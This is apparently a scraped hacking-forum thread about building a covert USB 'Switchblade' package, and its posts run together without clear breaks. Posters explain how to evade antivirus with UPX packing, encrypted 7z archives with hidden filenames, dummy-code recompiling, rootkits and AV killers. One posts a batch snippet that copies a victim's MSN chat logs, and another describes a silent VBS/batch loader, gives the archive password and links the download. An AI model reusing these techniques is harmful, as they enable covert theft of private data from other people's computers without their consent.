Gandalf the l33er

You should try to search, and reads some books on computers, or read about it in the internet. You have to have a solid knowledge about computers to understand this fully.

For some reason though, when I do not unhide them, they can still be executed. I think that the only problem when hiding executables is that some programs won't view the files - which is the whole point of hidden files. They should still be able to execute.

I have compressed ALL files in 7zBlade with UPX, and it also prevents AV from detecting the "tools", sometimes even when they are run.

Well...i still prefer .rar,but you know that :p Though i don't think that there are man AV's that will scan .7zip properly,simply because it isn't really a much used format... Yearh i know And even if they scanned, they wouldn't find anything, because even the file _names_ are encrypted. Btw: I could insert DontDetectMeStupidAV in the middle of all filenames to disable AV detection by name :-D

Yeah, actually the 7z format is the best on the market for many applications! You should try 7-zip.

That's not entirely true. A zipped file with a single layer of encryption still exposes the file names in the archive. If the scanner is set to search for certain file types (vbs, scr, bat) etc, it will delete the file. This is particularly true when sending archives through email. The one way to combat this is to zip the files, encrypt, zip the zip, encrypt. Then the scanner only see the second encrypted zip file. You are right, that problem applies to Zip files. But not to 7z files, especially not when you check the "encrypt filenames" button . If you try to open the image in 7-zip, you will be prompted for PW before the contents are shown - not only when you extract. So, the AV can't detect the harmful files in the archive, only the files extracted to %temp%devices, and it can for sure NOT track back where the files were extracted from (Which is nice - when you are "fixing" a friends computer, they see the virus was located at the c: drive, not on your thumb drive).

Any modern AV monitors _constantly_ for the opening of files - vbs, doc, exe and many more file types - and _before_ they are opened, they are scanned. After they are opened, memory is scanned every x milliseconds to check if any process created a malicious thread or contains a malicious file. So, atm where the AV gets to know the .exe in its definition file, the only thing you can do is to obscurize it with UPX.

You are right v'cent. I've made a new version, it is about 1/5 MB and finishes in 19 seconds. Scroll up to the first post to DL.

Just to clarify: C is used as OOP, but OOP is just a lot more simpler and powerful in C++. Actually, i think C is much more straightforward to learn that C++, think about learning a n00b about operator overloading 8-)

V'cent, sablefoxx is right. The executable will be decrypted into memory at _some_ point, and the AV will grab it. The only other solutions are making a rootkit or recompiling source with different settings/addded dummy code.

It is very hard... i _have_ compressed all the files, but as soon as they are run, the memory image in RAM is the same as if they were not compressed. The only way of making them undetectable is to recompile them with a lot of unused functions (which only exist to change the binary pattern) added. The problem is that many of the apps are commercial or non Open-Source, so recompiling isn't that simple. If they should be hidden for taskmanager is the only _easy_ way to make them services, which also needs recompiling. There is one other possibility: A rootkit. But i am not a H4xX0R, i'm only a _1337_ h4xX0r. Maybe you can ask the good folks at Sony if you need a rootkit :P Which executables do your AV detect (btw i AM planning to include an AV killer (maybe hexlax', as soon he makes an AV-kill-only versoin))?

Yes of course, why not? Maybe because encrypting changes the bit pattern...

The AV finds viruses by looking at the bit layout... try to modify the applications by packing/unpacking them with upx, http://upx.sourceforge.net/. Open a cmd, cd to the folder containing the files and upx.exe, enter upx -9 * to compress all files as much as possible, or upx -d * to decompress.

Yes, | sends the output of the left-side commando to the right-size commando. A very common use of it is cat largefile.txt | more , which displays the file in "screens", using the utility more.exe. Another way to say it: (taken from http://www.infionline.net/~wtnewton/batch/batguide.html)

Try 7-Zip. http://7-zip.org/. It zips better than many other programs, extracts about all formats, and is free. I've used the command-line version in my project http://forums.hak5.org/index.php/topic,8347.0.html. I strongly recommend it. After installing, just right-click on the file->7-Zip>Extract Here.

Why don't just google it before bothering us with it? try to google autorun.inf or launchu3.exe

He probably modded the CD partition as described in the switchblade thread.. Look around, you'll find it.

It's indeed a very nice package hexlax, mad_props to ya! But, i like to keep it as small as possible, so i will wait till you have made a "light" version, that only kills AV. I've updated my package quite a bit, added msn messenger chatlog stealer and made the whole thing a lot more customizeable. See the first post for details.

I don't think it's possible, if posssible you would have to sort of reflash the sontroller chip...

According to Nirsoft, http://www.nirsoft.net/utils/mspass.html should work with AOL.

I decided to come up with something new. This package first puts the dir to the messenger chat history folder in a text file (coudn't see any elegant way to do it), and then reads the textfile and put the dir in a var. Then it copies the chatlog. Needed file: http://www.myupload.dk/showfile/9418f7520.exe/ Commands: .MsnHistory.exe>msnlogdir.txt Set /P MSNLOG=<msnlogdir.txt del msnlogdir.txt md WIPdump%computername%Chatlog xcopy /E /C /H /Y /I "%MSNLOG%" "WIPdump%computername%Chatlog" What do you think? (the little cmdline app is a modded version of some code from some forum)

Ill include http://forums.hak5.org/index.php/topic,8319.0.html as soon as it gets released. I've created a drop with the files at http://drop.io/hak5files. Anybody can add files (hacks and similar) if they wish to. The password is Hak5Rulez.

Dear everybody. . Just finished a version of the USB Switchblade, where all the files are stored in a 7zip file. The password for the file is haxx0r. The advantage is that virus scanners can't find harmfull files inside a encrypted archive, + smaller overall size (around 1 MB). It works no matter where you place it, in any folder on any drive. Files included: Start. vbs: Runs run. bat in "silent" mode, VERY silent, NO black popups are shown Run. bat: Decrypts and extracts the image. 7z using 7z. exe (7-zip command-line version) and runs the specified commands. 7z. exe: 7-zip CLI. (http://www.7-zip.org/) image. 7z: A 7z archive encrypted with the password "haxx0r", containing the bin files. NEWEST version: ONLY 560 kb! Uses %temp% and finishes in about 19 seconds! Includes msn chatlog stealer Direct link OLD version: Myupload